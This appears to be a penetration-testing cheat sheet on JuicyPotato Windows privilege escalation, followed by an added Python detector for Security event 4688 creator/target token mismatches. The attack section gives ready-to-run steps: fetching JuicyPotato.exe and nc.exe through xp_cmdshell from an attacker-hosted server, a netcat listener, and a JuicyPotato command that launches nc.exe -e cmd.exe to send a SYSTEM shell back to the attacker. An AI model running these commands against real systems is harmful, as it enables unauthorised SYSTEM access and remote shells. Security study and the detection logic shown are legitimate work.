
🥔 JuicyPotato

Escalating privileges to SYSTEM level when the command whoami /priv confirms that SeImpersonatePrivilege is listed for our user.

RottenPotatoNG and its variants leverage a privilege escalation chain that relies on the BITS service, a MiTM listener on 127.0.0.1:6666, and the SeImpersonate or SeAssignPrimaryToken privilege. During a Windows build review we found a setup where BITS was intentionally disabled and port 6666 was taken.

Download from: https://github.com/ohpe/juicy-potato

1. Upload JuicyPotato.exe and nc.exe to the target server.

```
# Serve the content from your Kali attacking machine
python3 -m http.server 80

# If we have, for example, an MSSQL connection with xp_cmdshell enabled
# (in PowerShell, wget is an alias of Invoke-WebRequest)
xp_cmdshell "powershell -c cd C:\Tools; wget http://IPfromOurKali/JuicyPotato.exe -outfile JuicyPotato.exe"
xp_cmdshell "powershell -c cd C:\Tools; wget http://IPfromOurKali/nc.exe -outfile nc.exe"
```

2. Set a listener on your attacking machine:

```
nc -lnvp 1234
```

3. Run JuicyPotato:

```
# -l: port the local COM server listens on
# -p: program to launch, -a: its arguments
# -t *: try both CreateProcessWithTokenW and CreateProcessAsUser

# From the MSSQL connection
xp_cmdshell c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe $IPattackingMachine 1234 -e cmd.exe" -t *

# From a terminal run by a user with SeImpersonatePrivilege:
.\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe $IPattackingMachine 1234 -e cmd.exe" -t *
```
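Added detection example (not from these notes or the JuicyPotato project): the escalation shows up in Security event 4688 with a creator account (Subject) that is a service account while the new process's Target Subject is SYSTEM, because the child is created from an impersonated token rather than inheriting its parent's. The Python below flags that creator/target mismatch over constructed 4688-style records; it assumes the Target Subject fields are populated whenever the new process token differs from the creator's, and the SIDs, host and paths in the samples are made up.

```python
import re
from typing import Dict, Iterable, List

# Well-known SID of NT AUTHORITY\SYSTEM; comparing SIDs avoids locale issues.
SYSTEM_SID = "S-1-5-18"
# 4688 shows NULL SID / "-" as Target Subject when the new process inherits its
# creator's token; a real SID there means it was created from another token.
NULL_SIDS = {"", "-", "S-1-0-0"}
_KV = re.compile(r'(\w+)="([^"]*)"')

def parse_event(line: str) -> Dict[str, str]:
    """Parse one key="value" event line (constructed format) into a dict."""
    return dict(_KV.findall(line))

def is_token_escalation(ev: Dict[str, str]) -> bool:
    """True when a non-SYSTEM creator produced a process running as SYSTEM."""
    if ev.get("EventID") != "4688":
        return False
    new_token = ev.get("TargetUserSid", "")
    if new_token in NULL_SIDS or new_token != SYSTEM_SID:
        return False
    return ev.get("SubjectUserSid", "") != SYSTEM_SID

def scan(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Return the alerting events with the fields an analyst pivots on."""
    keys = ("SubjectUserName", "ParentProcessName", "NewProcessName", "CommandLine")
    return [{k: ev.get(k, "") for k in keys}
            for ev in map(parse_event, lines) if is_token_escalation(ev)]

# Constructed sample events, not real logs; SIDs, host and paths are made up.
SVC_SID = "S-1-5-80-1111111111-2222222222-3333333333-4444444444-5555555555"
SAMPLE_EVENTS = [
    # benign: services.exe (SYSTEM) starting SQL Server under a virtual service account
    f'EventID="4688" SubjectUserSid="{SYSTEM_SID}" SubjectUserName="HOST$" '
    f'TargetUserSid="{SVC_SID}" TargetUserName="MSSQLSERVER" '
    'ParentProcessName="C:\\Windows\\System32\\services.exe" '
    'NewProcessName="C:\\Program Files\\MSSQL\\Binn\\sqlservr.exe" CommandLine=""',
    # benign: xp_cmdshell child inheriting the service token (Target is NULL SID)
    f'EventID="4688" SubjectUserSid="{SVC_SID}" SubjectUserName="MSSQLSERVER" '
    'TargetUserSid="S-1-0-0" TargetUserName="-" '
    'ParentProcessName="C:\\Program Files\\MSSQL\\Binn\\sqlservr.exe" '
    'NewProcessName="C:\\Windows\\System32\\cmd.exe" CommandLine="cmd /c whoami /priv"',
    # the JuicyPotato pattern: service-account creator, SYSTEM token on the new process
    f'EventID="4688" SubjectUserSid="{SVC_SID}" SubjectUserName="MSSQLSERVER" '
    f'TargetUserSid="{SYSTEM_SID}" TargetUserName="SYSTEM" '
    'ParentProcessName="C:\\tools\\JuicyPotato.exe" '
    'NewProcessName="C:\\Windows\\System32\\cmd.exe" CommandLine="cmd.exe /c c:\\tools\\nc.exe"',
]

ALERTS = scan(SAMPLE_EVENTS)  # one hit: the cmd.exe spawned as SYSTEM by JuicyPotato.exe
```

Correlating the hit with its parent chain (sqlservr.exe to cmd.exe to the flagged child) is what separates this from legitimate SYSTEM process creation by services.exe.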
Last update: 2025-02-23
Created: February 23, 2025 21:12:05